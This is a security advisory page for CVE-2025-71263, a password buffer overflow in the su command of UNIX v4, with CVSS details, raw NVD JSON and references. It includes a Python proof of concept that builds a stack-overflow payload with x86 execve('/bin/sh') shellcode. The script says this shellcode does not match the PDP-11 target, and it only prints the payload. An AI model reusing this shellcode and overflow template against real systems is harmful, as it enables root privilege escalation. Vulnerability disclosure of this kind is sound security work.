Security Vulnerability Report
CVE-2025-71263 CVSS 7.4 HIGH

Published: 2026-03-13 19:53:54
Last Modified: 2026-03-21 22:16:18

Description

In UNIX Fourth Research Edition (v4), the su command is vulnerable to a buffer overflow due to the 'password' variable having a fixed size of 100 bytes. A local user can exploit this to gain root privileges. It is unlikely that UNIX v4 is running anywhere outside of a very small number of lab environments. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.

CVSS Details

CVSS Score: 7.4
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

UNIX Fourth Research Edition (v4) su command < all versions (no longer maintained)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
#!/usr/bin/env python3
"""
CVE-2025-71263 PoC - UNIX v4 su command buffer overflow

This PoC demonstrates the buffer overflow in the su command's password handling.
Note: This is for educational and authorized testing purposes only.
"""
import subprocess
import struct
import sys


def create_exploit_payload():
    """
    Create a payload that exploits the 100-byte password buffer overflow.
    The payload is designed to overwrite the return address on the stack.
    """
    # Buffer size in the vulnerable code
    BUFFER_SIZE = 100

    # NOP sled for more reliable exploitation
    nop_sled = b'\x90' * 40

    # Shellcode for spawning a root shell (example)
    # This is a simple execve("/bin/sh", ["/bin/sh", NULL], NULL) shellcode
    # NOTE: these bytes are 32-bit x86 Linux opcodes (int 0x80 syscall).
    # UNIX v4 ran on the PDP-11, so the payload is illustrative only and
    # does not match the affected platform.
    shellcode = (
        b'\x31\xc0'  # xor eax, eax
        b'\x50'      # push eax
        b'\x68'      # push \x2f\x2f\x73\x68 (//sh)
        b'//sh'
        b'\x68'      # push \x2f\x62\x69\x6e (/bin)
        b'/bin'
        b'\x89\xe3'  # mov ebx, esp
        b'\x50'      # push eax
        b'\x53'      # push ebx
        b'\x89\xe1'  # mov ecx, esp
        b'\x31\xd2'  # xor edx, edx
        b'\xb0\x0b'  # mov al, 0xb (execve)
        b'\xcd\x80'  # int 0x80
    )

    # Padding to reach the return address
    padding = b'A' * (BUFFER_SIZE - len(nop_sled) - len(shellcode))

    # Target return address (would need to be determined for specific target)
    # This is a placeholder - in real exploitation, this should point to nop sled or shellcode
    return_address = struct.pack('<I', 0xbffff500)  # Example stack address

    payload = nop_sled + shellcode + padding + return_address
    return payload


def test_vulnerability():
    """
    Test if the system is vulnerable by attempting to trigger the buffer overflow.
    """
    print("[*] CVE-2025-71263 - UNIX v4 su command Buffer Overflow")
    print("[*] This PoC is for authorized testing only")

    try:
        payload = create_exploit_payload()
        print(f"[*] Generated payload length: {len(payload)} bytes")
        print(f"[*] Payload (hex): {payload.hex()}")

        # In a real scenario, this would be passed to the su command
        # subprocess.run(['su', '-c', 'id'], input=payload, timeout=5)

        print("[!] Note: This vulnerability affects UNIX v4 which is rare in production")
        print("[!] Actual exploitation requires the vulnerable UNIX v4 system")
    except Exception as e:
        print(f"[-] Error: {e}")


if __name__ == '__main__':
    test_vulnerability()
```

References

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-71263",
    "sourceIdentifier": "[email protected]",
    "published": "2026-03-13T19:53:53.983",
    "lastModified": "2026-03-21T22:16:18.207",
    "vulnStatus": "Awaiting Analysis",
    "cveTags": [
      {"sourceIdentifier": "[email protected]", "tags": ["unsupported-when-assigned"]}
    ],
    "descriptions": [
      {
        "lang": "en",
        "value": "In UNIX Fourth Research Edition (v4), the su command is vulnerable to a buffer overflow due to the 'password' variable having a fixed size of 100 bytes. A local user can exploit this to gain root privileges. It is unlikely that UNIX v4 is running anywhere outside of a very small number of lab environments. NOTE: This vulnerability only affects products that are no longer supported by the maintainer."
      },
      {
        "lang": "es",
        "value": "En UNIX Cuarta Edición de Investigación (v4), el comando su es vulnerable a un desbordamiento de búfer debido a que la variable 'password' tiene un tamaño fijo de 100 bytes. Un usuario local puede explotar esto para obtener privilegios de root. Es poco probable que UNIX v4 se esté ejecutando en algún lugar fuera de un número muy reducido de entornos de laboratorio."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "baseScore": 7.4,
            "baseSeverity": "HIGH",
            "attackVector": "LOCAL",
            "attackComplexity": "HIGH",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 1.4,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [{"lang": "en", "value": "CWE-120"}]
      }
    ],
    "references": [
      {"url": "https://discuss.systems/@ricci/115747843169814700", "source": "[email protected]"},
      {"url": "https://sigma-star.at/blog/2025/12/unix-v4-buffer-overflow/", "source": "[email protected]"},
      {"url": "https://www.spinellis.gr/blog/20251223/", "source": "[email protected]"},
      {"url": "https://www.tuhs.org/pipermail/tuhs/2026-January/032991.html", "source": "[email protected]"},
      {"url": "http://www.openwall.com/lists/oss-security/2026/03/20/6", "source": "af854a3a-2127-422b-91ae-364da2661108"},
      {"url": "http://www.openwall.com/lists/oss-security/2026/03/21/4", "source": "af854a3a-2127-422b-91ae-364da2661108"}
    ]
  }
}
```